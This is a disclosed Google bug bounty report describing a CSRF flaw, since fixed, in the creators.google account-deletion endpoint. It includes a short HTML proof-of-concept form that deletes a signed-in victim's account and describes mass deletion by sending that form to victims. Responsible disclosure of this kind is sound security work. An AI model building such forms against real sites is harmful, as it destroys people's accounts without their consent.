Skip to Content (Press Enter)
Google
Bug Hunters
CSRF
Reported by:
Irwan One
Google VRP
triaged
17:23 | Nov 22, 2021
accepted
21:14 | Nov 22, 2021
fixed
13:24 | Feb 10, 2022
reward decided
$100
Summary:
CSRF
Product:
https://creators.google/api/forgetme/
URL:
https://creators.google/api/forgetme/
Vulnerability type:
Cross-site request forgery (CSRF)
Details
hi google,
i'm testing your creator feature and see that csrf token doesn't work in delete account by using GET method in parameter
https://creators.google/api/forgetme/
then account is deleted.
Production steps:
Sign in
https://creators.google/
then save the csrf payload with the html extension, (csrf.html)
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
 <form action="https://creators.google/api/forgetme/">
   <input type="submit" value="Submit request" />
 </form>
</body>
</html>
send it to the victim, the victim's account will be completely deleted.
Impact :
delete any account via CSRF Bug, because token is not validated by GET method in delete account feature.
Attack scenario
Delete mass creator google account by sending csrf to victim
登录
使用 Google 账号登录